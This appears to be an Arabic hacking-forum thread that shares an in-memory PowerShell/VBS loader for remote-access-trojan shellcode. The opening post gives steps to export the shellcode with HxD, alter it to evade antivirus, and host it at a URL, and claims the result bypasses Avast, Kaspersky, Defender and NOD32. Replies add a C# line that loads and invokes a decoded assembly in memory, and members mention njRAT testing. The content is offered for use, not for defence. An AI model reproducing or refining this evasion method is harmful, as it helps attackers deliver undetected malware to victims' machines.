Simple in memory powershell loader

تم تحميل الصفحة في 0,4061632 ثانية
Simple in memory powershell loader
إنضم
7 يوليو 2016
المشاركات
246
الإعجابات
361
النقاط
63
الإقامة
JEDDAH City
سلام عليكم ورحمة الله وبركاته,

لاحظت نقطة الادخال التقليديه صارت مكشوفه من النود وكذا حماية اخرى.

حبيت انزل لودر بنقطة ادخال مموهة نوع ما وادت الغرض بالتخطي.

1- قم بنسخ شل كود سيرفرك على شكل سي شارب من خلال برنامج

HxD

2-استبدل بعضا من النص للمساعدة في تخطي الانتي فايروس ..

3-ارفع قيم الشل كود على رابط بعد حذف الاقواس والكلام الزآئد بأعلى النص.

واستخدم السكربت كما بالشرح.

الملف الناتج vbs

الناتج تخطي سكان ورن تايم للـ Avast, Kaspersky,, w10 defender and Node32

 

mr'hack

Beginner Developer
rankrank
إنضم
28 سبتمبر 2013
المشاركات
233
الإعجابات
198
النقاط
43
اكواد الشل كود رائع
هل يمكن تعديل علي نقة الادخل حتي تاخذ بامريتر غير null
ممكن شرح يسيط والف شكر علي الشل
 
إنضم
7 يوليو 2016
المشاركات
246
الإعجابات
361
النقاط
63
الإقامة
JEDDAH City
اكواد الشل كود رائع
هل يمكن تعديل علي نقة الادخل حتي تاخذ بامريتر غير null
ممكن شرح يسيط والف شكر علي الشل
بعتقد تقدر, ماجربتها شخصيا

جرب استبدل احد الـ $null

 
إنضم
7 يوليو 2016
المشاركات
246
الإعجابات
361
النقاط
63
الإقامة
JEDDAH City
اكواد الشل كود رائع
هل يمكن تعديل علي نقة الادخل حتي تاخذ بامريتر غير null
ممكن شرح يسيط والف شكر علي الشل

او استخدم هذه الطريقه

{Executing .net in Memory without Entrypoint {Powershell

عندما تعمل كول للـ Main()

ضع بين الاقواس البارامتر , بالشرح مشروعي لا ياخذ اي بارامتر فلذلك تركته فارغ
 
الإعجابات: XB-16

mr'hack

Beginner Developer
rankrank
إنضم
28 سبتمبر 2013
المشاركات
233
الإعجابات
198
النقاط
43
بعتقد تقدر, ماجربتها شخصيا

جرب استبدل احد الـ $null

string[] a = new string[1];
Assembly.Load(gg(File.ReadAllBytes(dynamilinkTMP), File.ReadAllBytes(eaurllTMP))).EntryPoint.Invoke(null, a);
هذه نقط ادخال تاخد برميتر استرنج ممكن تكبة وانا راح اجرب اسف لو تعبك معي
 
إنضم
7 يوليو 2016
المشاركات
246
الإعجابات
361
النقاط
63
الإقامة
JEDDAH City
string[] a = new string[1];
Assembly.Load(gg(File.ReadAllBytes(dynamilinkTMP), File.ReadAllBytes(eaurllTMP))).EntryPoint.Invoke(null, a);
هذه نقط ادخال تاخد برميتر استرنج ممكن تكبة وانا راح اجرب اسف لو تعبك معي
اي رات تحاول تشغل ؟, بجرب من عندي واللي يضبط بكتبه لك هنا
 

Riad HY

Beginner Developer
rank
إنضم
12 مايو 2019
المشاركات
7
الإعجابات
5
النقاط
3
العمر
17
الإقامة
Palestine
تقدر اخ تنزل السورس للشيل كامل ؟
و طريقه جميله و اظن قابله للتعديل من ناحية نقطه الادخال
و يمكن استغلالها في اكثر من شيء ليس فقط من ناحية شيل ...
 
الإعجابات: XB-16
إنضم
7 يوليو 2016
المشاركات
246
الإعجابات
361
النقاط
63
الإقامة
JEDDAH City
تقدر اخ تنزل السورس للشيل كامل ؟
و طريقه جميله و اظن قابله للتعديل من ناحية نقطه الادخال
و يمكن استغلالها في اكثر من شيء ليس فقط من ناحية شيل ...
ايش تقصد بالشل ؟

بشرحي الشل كود أقصد به شل كود السيرفر.. اللي مستخرجه بـ HxD

ما فهمت سؤالك.
 
الإعجابات: XB-16

Riad HY

Beginner Developer
rank
إنضم
12 مايو 2019
المشاركات
7
الإعجابات
5
النقاط
3
العمر
17
الإقامة
Palestine
ايش تقصد بالشل ؟

بشرحي الشل كود أقصد به شل كود السيرفر.. اللي مستخرجه بـ HxD

ما فهمت سؤالك.
في الثانيه 33
فتحت انت سورس , تقدر تنزله ؟
 
الإعجابات: XB-16

Capony

Beginner Developer
rank
إنضم
2 يناير 2019
المشاركات
62
الإعجابات
51
النقاط
18
العمر
29
سلام عليكم ورحمة الله وبركاته,

لاحظت نقطة الادخال التقليديه صارت مكشوفه من النود وكذا حماية اخرى.

حبيت انزل لودر بنقطة ادخال مموهة نوع ما وادت الغرض بالتخطي.

1- قم بنسخ شل كود سيرفرك على شكل سي شارب من خلال برنامج

HxD

2-استبدل بعضا من النص للمساعدة في تخطي الانتي فايروس ..

3-ارفع قيم الشل كود على رابط بعد حذف الاقواس والكلام الزآئد بأعلى النص.

واستخدم السكربت كما بالشرح.

الملف الناتج vbs

الناتج تخطي سكان ورن تايم للـ Avast, Kaspersky,, w10 defender and Node32

طريقة رائعه - لكن node32 حددلها قيمة ران تايم للأسف

اعتقد انه يمكن اعادة تطوير الفكرة
 
إنضم
7 يوليو 2016
المشاركات
246
الإعجابات
361
النقاط
63
الإقامة
JEDDAH City
طريقة رائعه - لكن node32 حددلها قيمة ران تايم للأسف

اعتقد انه يمكن اعادة تطوير الفكرة
لسه اختبرته عالنود سيرفر نجرات وتخطى.

ممكن توضح نوع التحذير اللي يجيك من النود ؟ هل بور شل داون لودر أم شي أخر ؟
 

NYAN CAT

مُميّز نُقطة لُغات البرمجة للعام 2019
rankrankrank
إنضم
14 نوفمبر 2017
المشاركات
644
الإعجابات
774
النقاط
113
الإقامة
Kuwait
لسه اختبرته عالنود سيرفر نجرات وتخطى.

ممكن توضح نوع التحذير اللي يجيك من النود ؟ هل بور شل داون لودر أم شي أخر ؟
ممكن في وقت فراغك تختبره لمدة 10-15 دقيقة؟ من غير استعمال ولا خاصية فقط اتصل وانتظر.
 

الأعضاء النشطين حاليآ الذين يشاهدون هذا الموضوع (1 عضو و 1 ضيف)

خيارات الاستايل

نوع الخط
مودك
اخفاء السايدر بار OFF
توسيط المنتدى OFF
فصل الأقسام OFF
الأقسام الفرعية OFF
عرض المشاركات
حجم الخط
معلومات العضو OFF
إخفاء التوقيع OFF

إرجاع خيارات الإستايل